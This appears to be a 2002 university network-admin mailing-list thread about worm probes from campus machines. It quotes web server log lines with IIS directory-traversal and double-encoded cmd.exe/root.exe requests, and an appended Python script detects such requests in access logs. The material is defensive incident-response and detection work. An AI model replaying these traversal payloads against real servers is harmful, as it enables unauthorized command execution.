I own three of them (.nscl.msu.edu machines) and am cleaning them up ASAP.
Thanks for the info. Sorry for any inconvenience.

Katie Clark
Computer Support
National Superconducting Cyclotron Laboratory
Michigan State University
(517) 333-6338

-----Original Message-----
From: MSU Network Administrators Group [mailto:[log in to unmask]]On Behalf Of Paul Donahue
Sent: Monday, January 21, 2002 9:27 AM
To: [log in to unmask]
Subject: Re: MS Virus or Worm activity

Not to be a "me-too"er but I have noticed the same from the same IP addresses on one of our windows boxes. ZoneAlarm showed approximately 400 alerts since 6pm Friday until 8am this morning.

Paul Donahue
Lead Computer/Network Technician
CVM Information Technology Center
A227 VMC, Michigan State University
Phone: 353-5551
Fax: 432-2937

>>> [log in to unmask] 01/21/02 08:51AM >>>

Probes from these hosts started coming in just before 11:00pm Saturday night:

35.8.164.90 - bigone.hrt.msu.edu
35.8.33.189 - fpc04.nscl.msu.edu
35.8.34.114 - cycpc54.nscl.msu.edu
35.8.33.203 - talon.nscl.msu.edu
35.8.107.198 - No host name in DNS.
               Domain: llc, Language Learning Center in Old Hort

Probe examples:

35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

--
Gene Willacker, Systems Analyst
MSU Division of Housing and Food Service
Food Stores Building
171 Service Road
East Lansing, MI 48824-1233
517-353-1691
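
Added example, not part of the original thread: a small Python scan of Common Log Format access logs that flags requests shaped like the probe examples above and groups them by source host. The function names, the documentation addresses (192.0.2.10, 198.51.100.7) and the sample log lines are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
SHELL = re.compile(r'(?:cmd|root)\.exe', re.I)
# Two-byte %c0/%c1 sequences, as in the probes above, used in place of "/" or "\"
ODD_SLASH = re.compile(r'%c[01]%[0-9a-f]{2}', re.I)
TRAVERSAL = re.compile(r'\.\.[\\/]')

def fully_decode(path, max_rounds=5):
    """Percent-decode until stable (%255c -> %5c -> backslash); return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote(path, encoding="latin-1")
        if nxt == path:
            break
        path, rounds = nxt, rounds + 1
    return path, rounds

def classify(line):
    m = CLF.match(line)
    if not m:
        return None
    host, _method, target, status = m.groups()
    path = target.split("?", 1)[0]            # only the path is decoded
    decoded, rounds = fully_decode(path)
    checks = [("shell-exe", SHELL.search(decoded)), ("multi-encoded", rounds > 1),
              ("odd-slash", ODD_SLASH.search(path)), ("traversal", TRAVERSAL.search(decoded))]
    reasons = [name for name, hit in checks if hit]
    return (host, int(status), reasons) if reasons else None

def summarize(lines, min_hits=3):
    """Per source host: (number of probe-like requests, sorted reasons seen)."""
    hits, why = Counter(), {}
    for host, _status, reasons in filter(None, map(classify, lines)):
        hits[host] += 1
        why.setdefault(host, set()).update(reasons)
    return {h: (n, sorted(why[h])) for h, n in hits.items() if n >= min_hits}

# Constructed sample (documentation addresses); paths modelled on the probes above
_T = '{} - - [01/Jan/2002:00:00:00 -0500] "GET {} HTTP/1.0" {} 300'
SAMPLE = [_T.format("192.0.2.10", p, 404) for p in (
    "/MSADC/root.exe?/c+dir", "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir")]
SAMPLE.append(_T.format("198.51.100.7", "/docs/my%20file.html", 200))
```

Calling summarize() on the lines of a real access log returns one entry per source host that made at least min_hits such requests, which is the per-host list a campus administrator would pass along to the machine owners.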